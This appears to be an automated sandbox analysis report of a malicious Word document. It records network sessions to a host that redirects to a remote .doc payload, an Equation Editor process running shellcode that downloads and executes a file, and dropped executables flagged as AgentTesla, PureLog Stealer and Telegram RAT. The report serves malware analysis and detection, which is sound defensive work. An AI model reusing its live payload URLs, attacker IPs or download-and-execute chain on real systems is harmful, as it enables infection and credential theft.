                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: wbze.de
                                                    2024-05-06 12:59:06 UTC384INHTTP/1.1 302 Found
                                                    Date: Mon, 06 May 2024 12:59:06 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    X-Powered-By: Express
                                                    Location: http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc
                                                    Vary: Accept
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 185
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    1192.168.2.2249165109.71.253.25443
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:11 UTC124OUTOPTIONS / HTTP/1.1
                                                    Connection: Keep-Alive
                                                    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                    translate: f
                                                    Host: wbze.de
                                                    2024-05-06 12:59:11 UTC247INHTTP/1.1 200 OK
                                                    Date: Mon, 06 May 2024 12:59:11 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    X-Powered-By: Express
                                                    Allow: GET,HEAD
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 8
                                                    ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                    Connection: close
                                                    2024-05-06 12:59:11 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                    Data Ascii: GET,HEAD


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    2192.168.2.2249166109.71.253.25443
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:12 UTC154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 62 7a 65 2e 64 65 0d 0a 0d 0a
                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
                                                    2024-05-06 12:59:13 UTC276INHTTP/1.1 404 Not Found
                                                    Date: Mon, 06 May 2024 12:59:13 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    X-Powered-By: Express
                                                    Content-Security-Policy: default-src 'none'
                                                    X-Content-Type-Options: nosniff
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 144
                                                    Connection: close
                                                    2024-05-06 12:59:13 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    3192.168.2.2249167109.71.253.25443
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:14 UTC154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 62 7a 65 2e 64 65 0d 0a 0d 0a
                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
                                                    2024-05-06 12:59:14 UTC276INHTTP/1.1 404 Not Found
                                                    Date: Mon, 06 May 2024 12:59:14 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    X-Powered-By: Express
                                                    Content-Security-Policy: default-src 'none'
                                                    X-Content-Type-Options: nosniff
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 144
                                                    Connection: close
                                                    2024-05-06 12:59:14 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.2249169109.71.253.254431516C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:15 UTC342OUTGET /u7xc HTTP/1.1
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    Host: wbze.de
                                                    Connection: Keep-Alive
                                                    2024-05-06 12:59:15 UTC384INHTTP/1.1 302 Found
                                                    Date: Mon, 06 May 2024 12:59:15 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    X-Powered-By: Express
                                                    Location: http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc
                                                    Vary: Accept
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 185
                                                    Connection: close
                                                    2024-05-06 12:59:15 UTC185INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 33 33 2e 33 34 2f 78 61 6d 70 70 2f 72 7a 7a 2f 72 7a 2f 62 65 61 75 74 69 66 75 6c 61 6e 69 6d 61 6b 69 6e 67 73 61 79 69 6e 67 73 68 65 77 61 73 72 65 61 6c 6c 79 62 65 61 75 74 69 66 75 6c 74 6f 67 6f 66 72 6f 6d 74 68 65 65 6e 74 69 72 65 6b 69 6e 67 64 6f 6d 74 6f 75 6e 64 65 72 73 74 61 6e 64 68 6f 77 6d 75 63 68 73 68 65 6c 6f 76 65 64 5f 5f 5f 68 65 72 6c 61 6e 64 61 6e 64 68 75 73 62 61 6e 64 73 68 65 69 73 67 6f 6f 64 2e 64 6f 63
                                                    Data Ascii: Found. Redirecting to http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.2249171109.71.253.254431516C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:17 UTC131OUTHEAD /u7xc HTTP/1.1
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: wbze.de
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    2024-05-06 12:59:17 UTC384INHTTP/1.1 302 Found
                                                    Date: Mon, 06 May 2024 12:59:17 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    X-Powered-By: Express
                                                    Location: http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc
                                                    Vary: Accept
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 185
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.2249173104.26.13.2054433296C:\Users\user\AppData\Roaming\html.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:29 UTC155OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                    Host: api.ipify.org
                                                    Connection: Keep-Alive
                                                    2024-05-06 12:59:29 UTC211INHTTP/1.1 200 OK
                                                    Date: Mon, 06 May 2024 12:59:29 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 12
                                                    Connection: close
                                                    Vary: Origin
                                                    CF-Cache-Status: DYNAMIC
                                                    Server: cloudflare
                                                    CF-RAY: 87f925d5690c498e-MIA
                                                    2024-05-06 12:59:29 UTC12INData Raw: 38 34 2e 31 37 2e 34 30 2e 31 30 31
                                                    Data Ascii: 84.17.40.101


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.2249174172.67.74.1524433532C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:41 UTC155OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                    Host: api.ipify.org
                                                    Connection: Keep-Alive
                                                    2024-05-06 12:59:41 UTC211INHTTP/1.1 200 OK
                                                    Date: Mon, 06 May 2024 12:59:41 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 12
                                                    Connection: close
                                                    Vary: Origin
                                                    CF-Cache-Status: DYNAMIC
                                                    Server: cloudflare
                                                    CF-RAY: 87f926218eb23343-MIA
                                                    2024-05-06 12:59:41 UTC12INData Raw: 38 34 2e 31 37 2e 34 30 2e 31 30 31
                                                    Data Ascii: 84.17.40.101


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:14:59:00
                                                    Start date:06/05/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                    Imagebase:0x13fec0000
                                                    File size:1'423'704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:14:59:16
                                                    Start date:06/05/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:14:59:21
                                                    Start date:06/05/2024
                                                    Path:C:\Users\user\AppData\Roaming\html.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\html.exe"
                                                    Imagebase:0x13c0000
                                                    File size:753'152 bytes
                                                    MD5 hash:4C8B56B125AE41293AA6028204D44268
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.399016918.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 37%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:14:59:27
                                                    Start date:06/05/2024
                                                    Path:C:\Users\user\AppData\Roaming\html.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\html.exe"
                                                    Imagebase:0x13c0000
                                                    File size:753'152 bytes
                                                    MD5 hash:4C8B56B125AE41293AA6028204D44268
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.656186717.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:11
                                                    Start time:14:59:36
                                                    Start date:06/05/2024
                                                    Path:C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                                                    Imagebase:0xc90000
                                                    File size:753'152 bytes
                                                    MD5 hash:4C8B56B125AE41293AA6028204D44268
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.421607400.0000000002151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.421607400.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 37%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:14:59:39
                                                    Start date:06/05/2024
                                                    Path:C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                                                    Imagebase:0xc90000
                                                    File size:753'152 bytes
                                                    MD5 hash:4C8B56B125AE41293AA6028204D44268
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.455352786.0000000002340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:14:59:41
                                                    Start date:06/05/2024
                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                    Imagebase:0x13c0000
                                                    File size:2'525'680 bytes
                                                    MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:14
                                                    Start time:14:59:44
                                                    Start date:06/05/2024
                                                    Path:C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                                                    Imagebase:0xc90000
                                                    File size:753'152 bytes
                                                    MD5 hash:4C8B56B125AE41293AA6028204D44268
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:14:59:46
                                                    Start date:06/05/2024
                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                    Imagebase:0x350000
                                                    File size:9'805'808 bytes
                                                    MD5 hash:326A645391A97C760B60C558A35BB068
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:16
                                                    Start time:14:59:48
                                                    Start date:06/05/2024
                                                    Path:C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                                                    Imagebase:0xc90000
                                                    File size:753'152 bytes
                                                    MD5 hash:4C8B56B125AE41293AA6028204D44268
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.656194441.0000000002407000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:28.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:72.2%
                                                      Total number of Nodes:97
                                                      Total number of Limit Nodes:3
                                                      execution_graph 451 3610583 ExitProcess 472 361059c 451->472 453 36105f1 473 36105a2 472->473 498 36105b8 473->498 475 36105f1 477 36105df 15 API calls 479 36105c5 477->479 478 36106a6 480 36106cb 3 API calls 478->480 479->475 481 3610638 479->481 483 36105d9 479->483 482 36106bd 480->482 481->478 484 361069d 8 API calls 481->484 485 36106c5 ShellExecuteW 482->485 491 361058f 482->491 518 3610617 483->518 486 3610657 URLDownloadToFileW 484->486 487 36106f0 ExitProcess 485->487 490 36106b6 5 API calls 486->490 492 36106e4 487->492 490->478 491->453 494 36105df 491->494 492->491 493 36106f3 ExitProcess 492->493 495 36105e2 494->495 496 3610617 15 API calls 495->496 497 36105f1 496->497 499 36105be 498->499 500 36105df 15 API calls 499->500 501 36105c5 499->501 500->501 503 3610638 501->503 505 36105d9 501->505 517 36105f1 501->517 502 36106cb 3 API calls 504 36106bd 502->504 506 361069d 8 API calls 503->506 515 36106a6 503->515 507 36106c5 ShellExecuteW 504->507 508 36105a9 504->508 511 3610617 15 API calls 505->511 509 3610657 URLDownloadToFileW 506->509 510 36106f0 ExitProcess 507->510 508->475 508->477 513 36106b6 5 API calls 509->513 514 36106e4 510->514 511->517 513->515 514->508 516 36106f3 ExitProcess 514->516 515->502 519 3610619 518->519 520 361062c 15 API calls 519->520 521 361061e 520->521 389 36106f7 GetPEB 390 3610705 389->390 391 3610617 392 3610619 391->392 395 361062c LoadLibraryW 392->395 410 3610646 395->410 397 36106a6 443 36106cb 397->443 402 36106c5 ShellExecuteW 449 36106f0 402->449 407 361061e 408 36106e4 408->407 409 36106f3 ExitProcess 408->409 411 3610649 410->411 412 361069d 8 API calls 411->412 413 3610657 URLDownloadToFileW 412->413 415 36106b6 5 API calls 413->415 416 36106a6 415->416 417 36106cb 3 API calls 416->417 418 36106bd 417->418 419 36106c5 ShellExecuteW 418->419 421 3610633 418->421 420 36106f0 ExitProcess 419->420 422 36106e4 420->422 421->397 424 361069d URLDownloadToFileW 421->424 422->421 423 36106f3 ExitProcess 422->423 425 36106a6 424->425 426 36106b6 5 API calls 424->426 427 36106cb 3 API calls 425->427 426->425 428 36106bd 427->428 429 36106c5 ShellExecuteW 428->429 430 3610657 URLDownloadToFileW 428->430 431 36106f0 ExitProcess 429->431 434 36106b6 430->434 432 36106e4 431->432 432->430 433 36106f3 ExitProcess 432->433 435 36106b8 434->435 436 36106bd 435->436 437 36106cb 3 API calls 435->437 438 36106c5 ShellExecuteW 436->438 441 361072a 436->441 437->436 439 36106f0 ExitProcess 438->439 440 36106e4 439->440 440->441 442 36106f3 ExitProcess 440->442 441->397 444 36106ce ShellExecuteW 443->444 445 36106f0 ExitProcess 444->445 446 36106e4 444->446 445->446 447 36106bd 446->447 448 36106f3 ExitProcess 446->448 447->402 447->407 450 36106f3 ExitProcess 449->450

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_03610500 1 Function_03610000 2 Function_03610583 6 Function_036106CB 2->6 8 Function_036106F0 2->8 12 Function_03610617 2->12 13 Function_036106B6 2->13 17 Function_0361069D 2->17 19 Function_0361059C 2->19 20 Function_036105DF 2->20 3 Function_036101A7 4 Function_03610646 4->6 4->8 4->13 4->17 5 Function_03610248 6->8 7 Function_0361062C 7->4 7->6 7->8 7->13 7->17 9 Function_03610770 10 Function_036104B2 11 Function_036106F7 21 Function_0361071F 11->21 12->7 13->6 13->8 14 Function_036104F8 15 Function_03610438 16 Function_036105B8 16->6 16->8 16->9 16->12 16->13 16->17 16->20 17->6 17->8 17->13 18 Function_0361025D 19->6 19->8 19->9 19->12 19->13 19->16 19->17 19->20 20->12

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 361062c-3610638 LoadLibraryW call 3610646 4 36106a8-36106c3 call 36106cb 0->4 5 361063a-36106a1 call 361069d URLDownloadToFileW call 36106b6 0->5 11 36106c5-36106e5 ShellExecuteW call 36106f0 4->11 12 361072a-3610736 4->12 32 36106a6 5->32 24 3610750-3610754 11->24 25 36106e7 11->25 14 3610739 12->14 16 3610741-3610745 14->16 17 361073b-361073f 14->17 21 3610747-361074b 16->21 22 361075a-361075c 16->22 17->16 20 361074d 17->20 20->24 21->20 21->22 29 361076c-361076d 22->29 27 3610756 24->27 28 3610758 24->28 25->14 30 36106e9 25->30 27->22 28->22 33 361075e-3610767 28->33 30->22 31 36106eb-36106f5 ExitProcess 30->31 32->4 36 3610730-3610733 33->36 37 3610769 33->37 36->33 38 3610735 36->38 37->29 38->14
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0361061E), ref: 0361062C
                                                        • Part of subcall function 03610646: URLDownloadToFileW.URLMON(00000000,03610657,?,00000000,00000000), ref: 0361069F
                                                        • Part of subcall function 03610646: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD
                                                        • Part of subcall function 03610646: ExitProcess.KERNEL32(00000000), ref: 036106F5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                      • String ID:
                                                      • API String ID: 2508257586-0
                                                      • Opcode ID: 27f4a37bb9126cd1424baba16c8d825596ae9fbf4fbf8c31fda54954d1e47cc1
                                                      • Instruction ID: 39e8b86a4b0b73e745b57bd81547643ff5c6a8a6ba490b8fb1f687eab1044be8
                                                      • Opcode Fuzzy Hash: 27f4a37bb9126cd1424baba16c8d825596ae9fbf4fbf8c31fda54954d1e47cc1
                                                      • Instruction Fuzzy Hash: 05216B9285C3C12EDB23A7300D7EB65BF645FA7200F5D49CEE0C20A4E3E6985461C79B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 40 36105b8-36105be call 3610770 43 36105c5-36105c6 40->43 44 36105c0 call 36105df 40->44 45 3610638 43->45 46 36105c8-36105cd 43->46 44->43 47 36106a8-36106c3 call 36106cb 45->47 48 361063a-361063f 45->48 46->45 49 36105cf 46->49 59 36106c5-36106e5 ShellExecuteW call 36106f0 47->59 60 361072a-3610736 47->60 51 3610640-3610649 48->51 50 36105d1-36105d5 49->50 49->51 53 36105d7 50->53 54 361062a 50->54 55 361064b-36106a6 call 361069d URLDownloadToFileW call 36106b6 51->55 53->55 57 36105d9-3610627 call 3610617 53->57 55->47 57->54 74 3610750-3610754 59->74 75 36106e7 59->75 62 3610739 60->62 64 3610741-3610745 62->64 65 361073b-361073f 62->65 70 3610747-361074b 64->70 71 361075a-361075c 64->71 65->64 69 361074d 65->69 69->74 70->69 70->71 80 361076c-361076d 71->80 78 3610756 74->78 79 3610758 74->79 75->62 81 36106e9 75->81 78->71 79->71 85 361075e-3610767 79->85 81->71 82 36106eb-36106f5 ExitProcess 81->82 90 3610730-3610733 85->90 91 3610769 85->91 90->85 92 3610735 90->92 91->80 92->62
                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,03610657,?,00000000,00000000), ref: 0361069F
                                                      • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD
                                                      • ExitProcess.KERNEL32(00000000), ref: 036106F5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID:
                                                      • API String ID: 3584569557-0
                                                      • Opcode ID: 3f37c819cc26392aa2a732347964719394f64c6d0f495c3a0bdaf2d44c4be55a
                                                      • Instruction ID: 082dad1804098b96361765f2bd5b9077c0ae0e50e31307c2691d8b78ca6b89f5
                                                      • Opcode Fuzzy Hash: 3f37c819cc26392aa2a732347964719394f64c6d0f495c3a0bdaf2d44c4be55a
                                                      • Instruction Fuzzy Hash: F2419A9685D3C12FDB23E7300D6EB95BF606F93100F5D89CEE0C64E0A3E6989561C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 95 3610646-36106c3 call 361069d URLDownloadToFileW call 36106b6 call 36106cb 107 36106c5-36106e5 ShellExecuteW call 36106f0 95->107 108 361072a-3610736 95->108 117 3610750-3610754 107->117 118 36106e7 107->118 109 3610739 108->109 111 3610741-3610745 109->111 112 361073b-361073f 109->112 115 3610747-361074b 111->115 116 361075a-361075c 111->116 112->111 114 361074d 112->114 114->117 115->114 115->116 121 361076c-361076d 116->121 119 3610756 117->119 120 3610758 117->120 118->109 122 36106e9 118->122 119->116 120->116 124 361075e-3610767 120->124 122->116 123 36106eb-36106f5 ExitProcess 122->123 127 3610730-3610733 124->127 128 3610769 124->128 127->124 129 3610735 127->129 128->121 129->109
                                                      Memory Dump Source
